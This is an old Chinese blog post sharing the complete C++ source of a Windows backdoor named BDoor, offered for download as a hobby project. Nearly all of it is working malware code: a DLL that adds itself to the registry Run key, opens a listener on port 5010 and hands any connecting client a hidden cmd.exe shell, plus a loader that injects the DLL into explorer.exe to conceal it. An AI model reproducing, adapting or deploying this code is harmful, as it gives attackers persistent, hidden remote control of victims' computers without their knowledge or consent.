后门程序BDoor及源码 选择自 amh 的 Blog
提交时间:2005-04-22提交用户:ffantasyYD工具分类:后门程序运行平台:Windows工具大小:316825 Bytes文件MD5 :95e120d97967a3679dfdbd82985ea1ca工具来源:http://www.uestc.edu.cn/web/default.aspx这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。>> 下载 <<
// BDoor.cpp : Defines the entry point for the DLL application.//
#include "stdafx.h"#include "winsock2.h"
#pragma comment(lib,"ws2_32")
#define PORT 5010#define REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
struct THREADPARAM{ SOCKET sock; HANDLE handle;};
DWORD WINAPI ControlThread(void *no);DWORD WINAPI BDoor(void *lp);DWORD WINAPI RecvThread(void *lp);DWORD WINAPI SendThread(void *lp);DWORD WINAPI WriteReg(void *no);
BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ){ switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: { ::CreateThread(NULL,0,ControlThread,NULL,0,NULL); break; }
case DLL_PROCESS_DETACH: { break; } } return TRUE;}
DWORD WINAPI ControlThread(void *no){ CreateThread(NULL,0,WriteReg,NULL,0,NULL);
WSADATA wsaData; SOCKET listenSock; if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0) { return -1; }
if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) { return -1; }
sockaddr_in localAddr,inAddr; int addrLen=sizeof(inAddr); localAddr.sin_addr.S_un.S_addr=0; localAddr.sin_family=AF_INET; localAddr.sin_port=htons(PORT); if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR) { closesocket(listenSock); return -1; } listen(listenSock,5);
while(TRUE) { SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen); DWORD ID; CreateThread(NULL,0,BDoor,&acceptSock,0,&ID); Sleep(100); }
closesocket(listenSock); ::WSACleanup();}
DWORD WINAPI WriteReg(void *no){ char sysPath[MAX_PATH]={0}; int ret=::GetSystemDirectory(sysPath,MAX_PATH); if(sysPath[ret-1]!='\\') strcat(sysPath,"\\"); strcat(sysPath,"DllInjection.exe"); int len=strlen(sysPath); while(TRUE) { HKEY hKey; if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS) continue; ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);
::RegCloseKey(hKey); Sleep(5000); } return 0;}
DWORD WINAPI BDoor(void *lp){ SOCKET sock=*((SOCKET *)lp); HANDLE hCmdOut,hCmdIn,hRead,hWrite;
SECURITY_ATTRIBUTES sec={0}; sec.nLength=sizeof(sec); sec.lpSecurityDescriptor=NULL; sec.bInheritHandle=TRUE; CreatePipe(&hCmdIn,&hWrite,&sec,0); CreatePipe(&hRead,&hCmdOut,&sec,0);
char cmdDir[MAX_PATH]={0}; ::GetSystemDirectory(cmdDir,MAX_PATH); if(cmdDir[strlen(cmdDir)-1]!='\\') strcat(cmdDir,"\\"); strcat(cmdDir,"cmd.exe");
STARTUPINFO startUpInfo={0}; startUpInfo.cb=sizeof(startUpInfo); startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; startUpInfo.wShowWindow=SW_HIDE; startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut; startUpInfo.hStdInput=hCmdIn;
PROCESS_INFORMATION processInfo={0}; int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo); if(ret==0) { return -1; } CloseHandle(hCmdIn); CloseHandle(hCmdOut);
DWORD ID1,ID2; HANDLE hRecvThread,hSendThread; THREADPARAM recvParam={0},sendParam={0};
recvParam.sock=sock; recvParam.handle=hWrite; hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);
sendParam.sock=sock; sendParam.handle=hRead; hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);
ULONG code; ::WaitForSingleObject(hRecvThread,INFINITE); ::GetExitCodeThread(hSendThread,&code); ::TerminateThread(hSendThread,code); ::GetExitCodeProcess(processInfo.hProcess,&code); ::TerminateProcess(processInfo.hProcess,code); closesocket(sock); CloseHandle(hWrite); CloseHandle(hRead); return 0;}
DWORD WINAPI RecvThread(void *lp){ char cmd[256]={0}; THREADPARAM param=*((THREADPARAM *)lp); while(1) { char temp[2]={0}; int ret=recv(param.sock,temp,1,0); if(ret==0) { break; } else if(ret==1) { send(param.sock,temp,1,0); strcat(cmd,temp); if(temp[0]=='\n') { if(_stricmp(cmd,"exit\r\n")==0) { break; } ULONG len; ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL); memset(cmd,0,256); } } } return 0;}
DWORD WINAPI SendThread(void *lp){ THREADPARAM param=*((THREADPARAM *)lp); char buf[1024]={0}; while(1) { ULONG len=0; ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL); if(len>0) { ::ReadFile(param.handle,buf,1024,&len,NULL); send(param.sock,buf,len,0); memset(buf,0,1024); } Sleep(100); } return 0;}
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
// DllInjection.cpp : Defines the entry point for the application.//
#include "stdafx.h"#include "windows.h"#include "stdlib.h"#include "tlhelp32.h"#include "io.h"
long GetProcessID(char *processName);
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow){ // TODO: Place code here. Sleep(5000); long ID=GetProcessID("explorer"); if(ID==-1) return -1;
HINSTANCE hDll; HINSTANCE (* pProc)(LPCTSTR); DWORD (WINAPI * pThreadProc)(void *); if((hDll=::LoadLibrary("kernel32.dll"))==NULL) return -1; if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL) return -1; pThreadProc=(DWORD (WINAPI *)(void *))pProc;
HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID); if(hProcess==NULL) return -1;
char pDllPath[MAX_PATH]={0}; char *pRemoteAddr=NULL; int ret=::GetSystemDirectory(pDllPath,MAX_PATH); if(pDllPath[ret-1]!='\\') strcat(pDllPath,"\\"); strcat(pDllPath,"BDoor.dll"); if(::_access(pDllPath,0)==-1) return -1; pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE); if(pRemoteAddr==NULL) return -1; ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL); if(ret==0) return -1; HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);
Sleep(100); ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT); ::CloseHandle(hProcess); return 0;}
long GetProcessID(char *processName){ HANDLE hSnapshot; PROCESSENTRY32 pe32={0}; BOOL fRet;
hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if(hSnapshot==NULL) return -1;
pe32.dwSize=sizeof(PROCESSENTRY32); fRet=Process32First(hSnapshot,&pe32); if(!fRet) return -1;
int g=0; char drive[_MAX_DRIVE]={0}; char dir[_MAX_DIR]={0}; char fname[_MAX_FNAME]={0}; char ext[_MAX_EXT]={0}; do { _splitpath(pe32.szExeFile,drive,dir,fname,ext); if(_stricmp(processName,fname)==0) { g=1; break; } }while(Process32Next(hSnapshot,&pe32)); if(g!=1) return -1;
return pe32.th32ProcessID;}
作者Blog:http://blog.csdn.net/amh/
|
[【技术文档】]后门程序BDoor及源码